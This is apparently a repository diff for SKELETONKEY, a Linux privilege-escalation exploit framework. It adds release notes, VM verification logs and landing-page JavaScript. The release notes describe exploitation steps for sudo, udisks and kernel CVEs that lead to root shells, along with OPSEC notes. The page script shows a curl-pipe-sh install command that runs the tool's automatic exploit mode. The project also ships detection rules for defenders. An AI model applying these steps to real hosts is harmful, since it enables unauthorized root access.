+### CVE-2018-14634 — `mutagen_astronomy` (Qualys)
+
+Closes the 2018 gap. `create_elf_tables()` int-wrap → on x86_64, a
+multi-GiB argv blob makes the kernel under-allocate the SUID
+carrier's stack and corrupt adjacent allocations. CISA-KEV-listed
+Jan 2026 despite the bug's age — legacy RHEL 7 / CentOS 7 / Debian
+8 fleets still affected. 🟡 PRIMITIVE (trigger documented;
+Qualys' full chain not bundled per verified-vs-claimed).
+`arch_support: x86_64+unverified-arm64`.
+
+### CVE-2019-14287 — `sudo_runas_neg1` (Joe Vennix)
+
+`sudo -u#-1 <cmd>` → uid_t underflows to 0xFFFFFFFF → sudo treats it
+as uid 0 → runs `<cmd>` as root even when sudoers explicitly says
+"ALL except root". Pure userspace logic bug; the famous Apple
+Information Security finding. detect() looks for a `(ALL,!root)`
+grant in `sudo -ln` output. `arch_support: any`. Sudo < 1.8.28.
+
+### CVE-2020-29661 — `tioscpgrp` (Jann Horn / Project Zero)
+
+TTY `TIOCSPGRP` ioctl race on PTY pairs → `struct pid` UAF in
+kmalloc-256. Affects everything through Linux 5.9.13. 🟡 PRIMITIVE
+(race-driver + msg_msg groom). Public PoCs from grsecurity/spender
+ Maxime Peterlin. `arch_support: x86_64+unverified-arm64`.
+
+### CVE-2024-50264 — `vsock_uaf` (a13xp0p0v / Pwnie 2025 winner)
+
+AF_VSOCK `connect()` races a POSIX signal that tears down the
+virtio_vsock_sock → UAF in kmalloc-96. **Pwn2Own 2024 + Pwnie Award
+2025 winner.** Reachable as plain unprivileged user (no userns
+required — unusual). Two public exploit paths: @v4bel + @qwerty
+kernelCTF chain (BPF JIT spray + SLUBStick) and Alexander Popov's
+msg_msg path (PT SWARM Sep 2025). 🟡 PRIMITIVE.
+`arch_support: x86_64+unverified-arm64`.
+
+### CVE-2024-26581 — `nft_pipapo` (Notselwyn II, "Flipping Pages")
+
+`nft_set_pipapo` destroy-race UAF. Sibling to our `nf_tables` module
+(CVE-2024-1086) — same Notselwyn "Flipping Pages" research paper,
+different specific bug in the pipapo set substrate. Same family
+detect signature. 🟡 PRIMITIVE.
+`arch_support: x86_64+unverified-arm64`.
+
+### Year-by-year coverage matrix
+
+```
+2016: ▓ 1     2021: ▓▓▓▓▓ 5     2025: ▓▓ 2
+2017: ▓ 1     2022: ▓▓▓▓▓ 5     2026: ▓▓▓▓ 4
+2018: ▓ 1 ←   2023: ▓▓▓▓▓▓▓▓ 8
+2019: ▓▓ 2 ←  2024: ▓▓▓ 3 ←
+2020: ▓▓ 2 ←
+```
+
+Every year 2016 → 2026 is now ≥1.
+
+### Corpus growth
+
+| | v0.8.0 | v0.9.0 |
+|---|---|---|
+| Modules registered | 34 | 39 |
+| Distinct CVEs | 29 | 34 |
+| Years with ≥1 CVE | 10 of 11 (missing 2018) | **11 of 11** |
+| Detection rules embedded | 131 | 151 |
+| Arch-independent (`any`) | 6 | 7 |
+| VM-verified | 22 | 22 |
+
+### Other changes
+
+- All 5 new modules ship complete detection-rule corpus
+  (auditd + sigma + yara + falco) — corpus stays at 4-format
+  parity with the rest of the modules.
+- `tools/refresh-cve-metadata.py` runs against 34 CVEs (was 29);
+  takes ~4 minutes due to NVD anonymous rate limit.
+
+---
+
+## SKELETONKEY v0.8.0 — 3 new 2025/2026 CVEs
+
+Closes the 2025 coverage gap. Three new modules from CVEs disclosed
+2025–2026, all with public PoC code we ported into proper
+SKELETONKEY modules:
+
+### CVE-2025-32463 — `sudo_chwoot` (Stratascale)
+
+Critical (CVSS 9.3) sudo logic bug: `sudo --chroot=<DIR>` chroots
+into a user-controlled directory before completing authorization +
+resolves user/group via NSS inside the chroot. Plant a malicious
+`libnss_*.so` + an `nsswitch.conf` that points to it; sudo dlopens
+the .so as root, ctor fires, root shell. Affects sudo 1.9.14 to
+1.9.17p0; fixed in 1.9.17p1 (which deprecated --chroot entirely).
+`arch_support: any` (pure userspace).
+
+### CVE-2025-6019 — `udisks_libblockdev` (Qualys)
+
+udisks2 + libblockdev SUID-on-mount chain. libblockdev's internal
+filesystem-resize/repair mount path omits `MS_NOSUID` and
+`MS_NODEV`. udisks2 gates the operation on polkit's
+`org.freedesktop.UDisks2.modify-device` action, which is
+`allow_active=yes` by default → any active console session user can
+trigger it without a password. Build an ext4 image with a SUID-root
+shell inside, get udisks to mount it, execute the SUID shell.
+Affects libblockdev < 3.3.1, udisks2 < 2.10.2. `arch_support: any`.
+
+### CVE-2026-43494 — `pintheft` (V12 Security)
+
+Linux kernel RDS zerocopy double-free. `rds_message_zcopy_from_user()`
+pins user pages one at a time; if a later page faults, the error
+unwind drops the already-pinned pages, but the msg's scatterlist
+cleanup drops them AGAIN. Each failed `sendmsg(MSG_ZEROCOPY)` leaks
+one pin refcount. Chain via io_uring fixed buffers to overwrite the
+page cache of a readable SUID binary → execve → root. Mainline fix
+commit `0cebaccef3ac` (posted to netdev 2026-05-05). Among common
+distros only **Arch Linux** autoloads the rds module — Ubuntu /
+Debian / Fedora / RHEL / Alma / Rocky / Oracle Linux either don't
+build it or blacklist autoload. `detect()` correctly returns OK
+on non-Arch hosts (RDS unreachable from userland). 🟡 PRIMITIVE
+status: primitive fires; full cred-overwrite via the shared
+modprobe_path finisher requires `--full-chain` on x86_64.
+
+### Corpus growth
+
+| | v0.7.1 | v0.8.0 |
+|---|---|---|
+| Modules registered | 31 | 34 |
+| Distinct CVEs | 26 | 29 |
+| 2025-CVE coverage | 0 | 2 |
+| Detection rules embedded | 119 | 131 |
+| Arch-independent (`any`) | 4 | 6 |
+| CISA KEV-listed | 10 | 10 (new ones not yet KEV'd) |
+| VM-verified | 22 | 22 |
+
+### Other changes
+
+- `tools/refresh-cve-metadata.py` — added curl fallback for the
+  CISA KEV CSV fetch (Python's urlopen was hitting timeouts against
+  CISA's HTTP/2 endpoint).
+- `tools/verify-vm/targets.yaml` — entries for the 3 new modules
+  with honest "no Vagrant box covers this yet" notes for
+  pintheft (needs Arch) and udisks_libblockdev (needs active
+  console session + udisks2 installed).
+
+---
+
+## SKELETONKEY v0.7.1 — arm64-static binary + per-module arch_support
+
+Point release on top of v0.7.0. Two additions:
+
+1. **`skeletonkey-arm64-static`** is now published alongside the
+   existing x86_64-static binary. Built native-arm64 in Alpine via
+   GitHub's `ubuntu-24.04-arm` runner pool. Works on Raspberry Pi 4+,
+   Apple Silicon Linux VMs, AWS Graviton, Oracle Ampere, Hetzner ARM,
+   and any other aarch64 Linux. `install.sh` auto-picks it.
+
+2. **`arch_support` per module** — a new field on
+   `struct skeletonkey_module` that honestly labels which architectures
+   the `exploit()` body has been verified on. Three categories:
+
+   - **`any`** (4 modules): pwnkit, sudo_samedit, sudoedit_editor,
+     pack2theroot. Purely userspace; arch-independent.
+   - **`x86_64`** (1 module): entrybleed. KPTI prefetchnta side-channel;
+     x86-only by physics (ARM uses TTBR_EL0/EL1 split, not CR3).
+     Already gated in source — returns PRECOND_FAIL on non-x86_64.
+   - **`x86_64+unverified-arm64`** (26 modules): kernel-exploitation
+     code that hasn't been verified on arm64 yet. `detect()` works
+     everywhere (it just reads `ctx->host`); the `exploit()` body uses
+     primitives (msg_msg sprays, ROP-style finishers, specific struct
+     offsets) that are likely portable to aarch64 but unproven.
+
+   `--list` adds an ARCH column; `--module-info` adds an `arch support:`
+   line; `--scan --json` adds an `arch_support` field per module.
+
+**What an arm64 user gets today:** the full detection/triage workflow
+works as well as on x86_64 (`--scan`, `--explain`, `--module-info`,
+`--detect-rules`, `--auto --dry-run`). Four exploit modules
+(`pwnkit`, `sudo_samedit`, `sudoedit_editor`, `pack2theroot`) will fire
+end-to-end. The remaining 26 modules currently mark themselves as
+"x86_64 verified; arm64 untested" — the bug class is generic but the
+exploitation hasn't been confirmed. Future arm64-Vagrant verification
+sweeps will promote modules to `any` as they're confirmed.
+
+---
+
+### From v0.7.0 — empirical verification + operator briefing
+
+The headline change since v0.6.0: **22 of 26 CVEs are now empirically
+confirmed against real Linux kernels in VMs**, with verification records
+baked into the binary and surfaced in `--list`, `--module-info`, and
+`--explain`. The four still-unverified entries (`vmwgfx`, `dirty_cow`,
+`dirtydecrypt`, `fragnesia`) are blocked by their target environment
+(VMware-only, ≤4.4 kernel, Linux 7.0 not yet shipping), not by missing
+code — see
+[`tools/verify-vm/targets.yaml`](https://github.com/KaraZajac/SKELETONKEY/blob/main/tools/verify-vm/targets.yaml)
+for the rationale.
+
+### Install
+
+Pre-built binaries below (x86_64 dynamic, x86_64 static-musl, arm64
+dynamic; all checksum-verified). Recommended for new installs:
+
+```bash
+curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh
+skeletonkey --version
+```
+
+Static-musl x86_64 is the default — works back to glibc 2.17, no
+library dependencies.
+
+### What's in this release
+
+**Empirical verification (the big one)**
+- `tools/verify-vm/` — Vagrant + Parallels scaffold. Boots
+  known-vulnerable kernels (stock distro or mainline via
+  `kernel.ubuntu.com/mainline/`), runs `--explain --active` per module,
+  records match/mismatch as JSONL.
+- 22 modules confirmed end-to-end across Ubuntu 18.04 / 20.04 / 22.04 +
+  Debian 11 / 12 + mainline kernels 5.15.5 / 6.1.10.
+- Per-module `verified_on[]` table baked into the binary. `--list` adds
+  a `VFY` column showing ✓ per verified module; footer prints
+  `31 modules registered · 10 in CISA KEV (★) · 22 empirically verified
+  in real VMs (✓)`.
+- `--module-info <name>` adds a `--- verified on ---` section.
+- `--explain <name>` adds a `VERIFIED ON` section.
+
+**`--explain MODULE` — one-page operator briefing**
+
+A single command renders, for any module: CVE / CWE / MITRE ATT&CK /
+CISA KEV status, host fingerprint, **live `detect()` trace** with
+verdict and interpretation, **OPSEC footprint** (what an exploit
+would leave on this host), detection-rule coverage matrix, and
+verification records. Paste-ready for triage tickets and SOC handoffs.
+
+**CVE metadata pipeline**
+
+`tools/refresh-cve-metadata.py` fetches CISA's Known Exploited
+Vulnerabilities catalog + NVD CWE classifications, generates
+`docs/CVE_METADATA.json` + `docs/KEV_CROSSREF.md` + the in-binary
+lookup table. **10 of 26 modules cover KEV-listed CVEs.** MITRE ATT&CK
+technique mapping (T1068 by default; T1611 for container escapes;
+T1082 for kernel info leaks). All surfaced in `--list` (★ column),
+`--module-info`, `--explain`, and `--scan --json` (new `triage`
+sub-object per module).
+
+**Per-module OPSEC notes**
+
+Every module's struct now carries an `opsec_notes` paragraph describing
+the runtime telemetry footprint: file artifacts, dmesg signatures,
+syscall observables, network activity, persistence side effects,
+cleanup behavior. Grounded in source + existing detection rules — the
+inverse of what the auditd/sigma/yara/falco rules look for. Surfaced
+in `--module-info` (text + JSON) and `--explain`.
+
+**119 detection rules across all 4 SIEM formats**
+
+Previously: auditd everywhere, sigma on top-10, yara/falco only on a
+handful. Now: 30/31 auditd, 31/31 sigma, 28/31 yara, 30/31 falco
+(the 3 remaining gaps are intentional skips — `entrybleed` is a pure
+timing side-channel with no syscall/file footprint;
+`ptrace_traceme` and `sudo_samedit` are pure-memory races with no
+on-disk artifacts).
+
+**Test harness**
+
+88 tests on every push: 33 kernel_range / host-fingerprint unit tests
+(`tests/test_kernel_range.c` — boundary conditions, NULL safety,
+multi-LTS, mainline-only) + 55 `detect()` integration tests
+(`tests/test_detect.c` — synthetic host fingerprints across 26
+modules). Coverage report at the end identifies any modules without
+direct test rows.
+
+**`core/host.c` shared host-fingerprint refactor**
+
+One probe of kernel / arch / distro / userns gates / apparmor /
+selinux / lockdown / sudo + polkit versions at startup. Every
+module's `detect()` consumes `ctx->host`. Adds `meltdown_mitigation[]`
+passthrough so `entrybleed` can distinguish "Not affected" (CPU
+immune; OK) from "Mitigation: PTI" (KPTI on; vulnerable to
+EntryBleed) without re-reading sysfs.
+
+**kernel_range drift detector**
+
+`tools/refresh-kernel-ranges.py` polls Debian's security tracker and
+reports drift between the embedded `kernel_patched_from` tables and
+what Debian actually ships. Already used to apply 9 corpus fixes in
+v0.7.0; 9 more `TOO_TIGHT` findings pending per-commit verification.
+
+**Marketing-grade landing page**
+
+[karazajac.github.io/SKELETONKEY](https://karazajac.github.io/SKELETONKEY/)
+— animated hero, `--explain` showcase with line-by-line typed terminal,
+bento-grid features, KEV / verification stat chips. New Open Graph
+card renders correctly on Twitter/LinkedIn/Slack/Discord.
+
+### Real findings from the verifier
+
+A handful of cases that show the project's "verified-vs-claimed bar"
+thesis paying off in real time:
+
+- **`dirty_pipe` on Ubuntu 22.04 (5.15.0-91-generic)** — version-only
+  check would say VULNERABLE (5.15.0 < 5.15.25 backport in our table),
+  but Ubuntu has silently backported the fix into the -91 patch level.
+  `--active` correctly identified the primitive as blocked → OK. Only
+  an empirical probe can tell.
+- **`af_packet` on Ubuntu 18.04 (4.15.0-213-generic)** — our target
+  expectation was wrong; 4.15 is post-fix. Caught + corrected by the
+  verifier sweep.
+- **`sudoedit_editor` on Ubuntu 22.04** — sudo 1.9.9 is the vulnerable
+  version, but the default vagrant user has no sudoers grant to abuse.
+  `detect()` correctly returns PRECOND_FAIL ("vuln version present, no
+  grant to abuse").
+
+### Coverage by audience
+
+- **Red team**: `--auto` ranks vulnerable modules by safety + runs the
+  safest, OPSEC notes per exploit, JSON for pipelines, no telemetry.
+- **Blue team**: 119 detection rules in all 4 SIEM formats, CISA KEV
+  prioritization, MITRE ATT&CK + CWE annotated, `--explain` triage
+  briefings.
+- **Researchers**: Source is the docs. CVE metadata sourced from
+  federal databases. `--explain` shows the reasoning chain. 22 VM
+  confirmations for trust.
+- **Sysadmins**: `--scan` works without sudo. Static-musl binary
+  drops on any Linux. JSON output for CI gates.
+
+### Compatibility
+
+- Default install: static-musl x86_64 — works on every Linux back to
+  glibc 2.17 (RHEL 7, Debian 9, Ubuntu 14.04+, Alpine, anything).
+- Also published: dynamic x86_64 (faster, modern glibc only) and
+  dynamic arm64 (Raspberry Pi 4+, Apple Silicon Linux VMs, ARM
+  servers).
+
+### Authorized testing only
+
+SKELETONKEY runs real exploits. By using it you assert you have
+explicit authorization to test the target system. See
+[`docs/ETHICS.md`](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ETHICS.md).
+
+### Links
+
+- [CVE inventory](https://github.com/KaraZajac/SKELETONKEY/blob/main/CVES.md)
+- [Verification records](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/VERIFICATIONS.jsonl)
+- [KEV cross-reference](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/KEV_CROSSREF.md)
+- [Detection playbook](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/DETECTION_PLAYBOOK.md)
+- [Architecture](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ARCHITECTURE.md)
+- [Roadmap](https://github.com/KaraZajac/SKELETONKEY/blob/main/ROADMAP.md)
@@ -0,0 +1,36 @@
+{"module":"pwnkit","verified_at":"2026-05-23T19:26:02Z","host_kernel":"5.4.0-169-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"cgroup_release_agent","verified_at":"2026-05-23T19:32:07Z","host_kernel":"5.10.0-27-amd64","host_distro":"Debian GNU/Linux 11 (bullseye)","vm_box":"generic/debian11","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"netfilter_xtcompat","verified_at":"2026-05-23T19:33:56Z","host_kernel":"5.10.0-27-amd64","host_distro":"Debian GNU/Linux 11 (bullseye)","vm_box":"generic/debian11","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"fuse_legacy","verified_at":"2026-05-23T19:35:49Z","host_kernel":"5.10.0-27-amd64","host_distro":"Debian GNU/Linux 11 (bullseye)","vm_box":"generic/debian11","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"dirty_pipe","verified_at":"2026-05-23T19:43:04Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"OK","status":"MISMATCH"}
+{"module":"dirty_pipe","verified_at":"2026-05-23T19:44:38Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"OK","actual_detect":"OK","status":"match"}
+{"module":"entrybleed","verified_at":"2026-05-23T19:50:32Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"overlayfs","verified_at":"2026-05-23T19:52:09Z","host_kernel":"5.4.0-169-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"overlayfs_setuid","verified_at":"2026-05-23T19:54:09Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"sudoedit_editor","verified_at":"2026-05-23T19:56:04Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"PRECOND_FAIL","status":"MISMATCH"}
+{"module":"nft_fwd_dup","verified_at":"2026-05-23T19:57:46Z","host_kernel":"5.10.0-27-amd64","host_distro":"Debian GNU/Linux 11 (bullseye)","vm_box":"generic/debian11","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"ptrace_traceme","verified_at":"2026-05-23T19:59:24Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"?","status":"MISMATCH"}
+{"module":"sudo_samedit","verified_at":"2026-05-23T20:00:52Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"?","status":"MISMATCH"}
+{"module":"af_packet","verified_at":"2026-05-23T20:02:23Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"?","status":"MISMATCH"}
+{"module":"pack2theroot","verified_at":"2026-05-23T20:04:20Z","host_kernel":"6.1.0-17-amd64","host_distro":"Debian GNU/Linux 12 (bookworm)","vm_box":"generic/debian12","expect_detect":"VULNERABLE","actual_detect":"OK","status":"MISMATCH"}
+{"module":"cls_route4","verified_at":"2026-05-23T20:13:16Z","host_kernel":"5.15.0-43-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"nft_payload","verified_at":"2026-05-23T20:15:45Z","host_kernel":"5.15.0-43-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"af_packet2","verified_at":"2026-05-23T20:18:13Z","host_kernel":"5.4.0-169-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"sequoia","verified_at":"2026-05-23T20:20:38Z","host_kernel":"5.4.0-169-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"ptrace_traceme","verified_at":"2026-05-23T20:23:07Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"sudo_samedit","verified_at":"2026-05-23T20:23:51Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"af_packet","verified_at":"2026-05-23T20:24:35Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"OK","status":"MISMATCH"}
+{"module":"pack2theroot","verified_at":"2026-05-23T20:25:19Z","host_kernel":"6.1.0-17-amd64","host_distro":"Debian GNU/Linux 12 (bookworm)","vm_box":"generic/debian12","expect_detect":"VULNERABLE","actual_detect":"PRECOND_FAIL","status":"MISMATCH"}
+{"module":"sudoedit_editor","verified_at":"2026-05-23T20:26:02Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"PRECOND_FAIL","actual_detect":"PRECOND_FAIL","status":"match"}
+{"module":"af_packet","verified_at":"2026-05-23T20:27:39Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"OK","actual_detect":"OK","status":"match"}
+{"module":"pack2theroot","verified_at":"2026-05-23T20:28:23Z","host_kernel":"6.1.0-17-amd64","host_distro":"Debian GNU/Linux 12 (bookworm)","vm_box":"generic/debian12","expect_detect":"PRECOND_FAIL","actual_detect":"PRECOND_FAIL","status":"match"}
+{"module":"nf_tables","verified_at":"2026-05-23T21:22:59Z","host_kernel":"5.15.5-051505-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"af_unix_gc","verified_at":"2026-05-23T21:27:13Z","host_kernel":"5.15.5-051505-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"nft_set_uaf","verified_at":"2026-05-23T21:30:41Z","host_kernel":"5.15.5-051505-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"stackrot","verified_at":"2026-05-23T21:34:12Z","host_kernel":"6.1.10-060110-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"sudo_chwoot","verified_at":"2026-05-24T02:39:11Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"udisks_libblockdev","verified_at":"2026-05-24T02:44:17Z","host_kernel":"6.1.0-17-amd64","host_distro":"Debian GNU/Linux 12 (bookworm)","vm_box":"generic/debian12","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"nft_pipapo","verified_at":"2026-05-24T03:27:10Z","host_kernel":"5.15.5-051505-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"sudo_runas_neg1","verified_at":"2026-05-24T03:29:18Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"tioscpgrp","verified_at":"2026-05-24T03:31:08Z","host_kernel":"5.4.0-26-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"dirtydecrypt","verified_at":"2026-05-24T05:16:27Z","host_kernel":"6.19.7-061907-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
@@ -0,0 +1,213 @@
+/* SKELETONKEY landing page — interactive bits.
+ * No frameworks. ~150 lines vanilla JS. Respects prefers-reduced-motion. */
+
+(function () {
+  'use strict';
+
+  const reduceMotion = window.matchMedia('(prefers-reduced-motion: reduce)').matches;
+
+  /* ============================================================
+   * 1. typed install command in the hero
+   * ============================================================ */
+  const installCmd =
+    'curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \\\n  && skeletonkey --auto --i-know';
+  const typedEl  = document.getElementById('install-typed');
+  const cursorEl = document.getElementById('install-cursor');
+
+  function typeInstall(cb) {
+    if (reduceMotion) {
+      typedEl.textContent = installCmd;
+      if (cursorEl) cursorEl.style.display = 'none';
+      if (cb) cb();
+      return;
+    }
+    let i = 0;
+    function step() {
+      typedEl.textContent = installCmd.slice(0, i);
+      i++;
+      if (i <= installCmd.length) {
+        setTimeout(step, 18 + Math.random() * 22);
+      } else {
+        if (cursorEl) {
+          // keep cursor blinking for 2s, then hide
+          setTimeout(() => { cursorEl.style.display = 'none'; }, 2000);
+        }
+        if (cb) cb();
+      }
+    }
+    step();
+  }
+
+  /* ============================================================
+   * 2. copy install command
+   * ============================================================ */
+  window.copyInstall = function (btn) {
+    const text = installCmd;
+    navigator.clipboard.writeText(text).then(() => {
+      const original = btn.textContent;
+      btn.textContent = 'copied!';
+      btn.classList.add('copied');
+      setTimeout(() => {
+        btn.textContent = original;
+        btn.classList.remove('copied');
+      }, 1500);
+    }).catch(() => {
+      btn.textContent = '(copy failed)';
+      setTimeout(() => { btn.textContent = 'copy'; }, 1500);
+    });
+  };
+
+  /* ============================================================
+   * 3. stat count-up animation on view
+   * ============================================================ */
+  function countUp(el) {
+    const target = parseInt(el.dataset.target, 10);
+    if (!target || reduceMotion) { el.textContent = target; return; }
+    const dur = 1100;
+    const start = performance.now();
+    function tick(now) {
+      const t = Math.min((now - start) / dur, 1);
+      // ease-out
+      const v = Math.round(target * (1 - Math.pow(1 - t, 3)));
+      el.textContent = v;
+      if (t < 1) requestAnimationFrame(tick);
+    }
+    requestAnimationFrame(tick);
+  }
+
+  /* ============================================================
+   * 4. --explain terminal: line-by-line reveal
+   * ============================================================ */
+  const explainHTML = [
+    '\n',
+    '<span class="t-rule">════════════════════════════════════════════════════</span>\n',
+    ' <span class="t-mod">nf_tables</span>   <span class="t-cve">CVE-2024-1086</span>\n',
+    '<span class="t-rule">════════════════════════════════════════════════════</span>\n',
+    ' <span class="t-summary">nf_tables nft_verdict_init UAF (cross-cache) → arbitrary kernel R/W</span>\n',
+    '\n',
+    '<span class="t-header">WEAKNESS</span>\n',
+    '  <span class="t-cwe">CWE-416</span>\n',
+    '  <span class="t-label">MITRE ATT&amp;CK:</span> <span class="t-tech">T1068</span>\n',
+    '\n',
+    '<span class="t-header">THREAT INTEL</span>\n',
+    '  <span class="t-kev-yes">★ In CISA Known Exploited Vulnerabilities catalog (added 2024-05-30)</span>\n',
+    '  <span class="t-label">Affected:</span> 5.14 ≤ K, fixed mainline 6.8; backports: 6.7.2 / 6.6.13 / 6.1.74 / 5.15.149 / 5.10.210\n',
+    '\n',
+    '<span class="t-header">HOST FINGERPRINT</span>\n',
+    '  <span class="t-label">kernel:</span>        5.15.0-43-generic (x86_64)\n',
+    '  <span class="t-label">distro:</span>        Ubuntu 22.04.5 LTS\n',
+    '  <span class="t-label">unpriv userns:</span> ALLOWED\n',
+    '\n',
+    '<span class="t-header">DETECT() TRACE (live; reads ctx->host, fires gates)</span>\n',
+    '<span class="t-i">[i] nf_tables: kernel 5.15.0-43-generic in vulnerable range</span>\n',
+    '<span class="t-i">[i] nf_tables: userns gate passed</span>\n',
+    '<span class="t-i">[i] nf_tables: nft_verdict_init reachable; bug is fireable here</span>\n',
+    '\n',
+    '<span class="t-header">VERDICT:</span> <span class="t-vuln">VULNERABLE</span>\n',
+    '  -&gt; bug is reachable. The OPSEC section below shows what a successful\n',
+    '     exploit() would leave on this host.\n',
+    '\n',
+    '<span class="t-header">OPSEC FOOTPRINT (what exploit() leaves on this host)</span>\n',
+    '  unshare(CLONE_NEWUSER|CLONE_NEWNET) + nfnetlink batch (NEWTABLE +\n',
+    '  NEWCHAIN/LOCAL_OUT + NEWSET verdict-key + NEWSETELEM malformed NFT_GOTO)\n',
+    '  committed twice. msg_msg cg-96 groom; dmesg: KASAN double-free on vuln\n',
+    '  kernels. Cleanup is finisher-gated; no persistent files on success.\n',
+    '\n',
+    '<span class="t-header">DETECTION COVERAGE (rules embedded in this binary)</span>\n',
+    '  <span class="t-check">✓</span> auditd    <span class="t-check">✓</span> sigma    <span class="t-check">✓</span> yara    <span class="t-check">✓</span> falco\n',
+  ];
+  function playExplain(el) {
+    if (reduceMotion) { el.innerHTML = explainHTML.join(''); return; }
+    let i = 0;
+    el.innerHTML = '';
+    function step() {
+      if (i >= explainHTML.length) return;
+      el.innerHTML += explainHTML[i];
+      i++;
+      // pause longer on blank lines to feel like real terminal output
+      const next = explainHTML[i - 1];
+      const delay = next === '\n' ? 60 : (45 + Math.random() * 50);
+      setTimeout(step, delay);
+    }
+    step();
+  }
+
+  /* ============================================================
+   * 5. quickstart tabs
+   * ============================================================ */
+  function initTabs() {
+    const tabs   = document.querySelectorAll('.tab');
+    const panels = document.querySelectorAll('.tab-panel');
+    tabs.forEach((t) => {
+      t.addEventListener('click', () => {
+        const tab = t.dataset.tab;
+        tabs.forEach((x) => x.classList.toggle('active', x === t));
+        panels.forEach((p) => p.classList.toggle('active', p.dataset.tab === tab));
+      });
+    });
+  }
+
+  /* ============================================================
+   * 6. scroll-triggered reveal + first-time triggers
+   * ============================================================ */
+  function initReveal() {
+    if (!('IntersectionObserver' in window) || reduceMotion) {
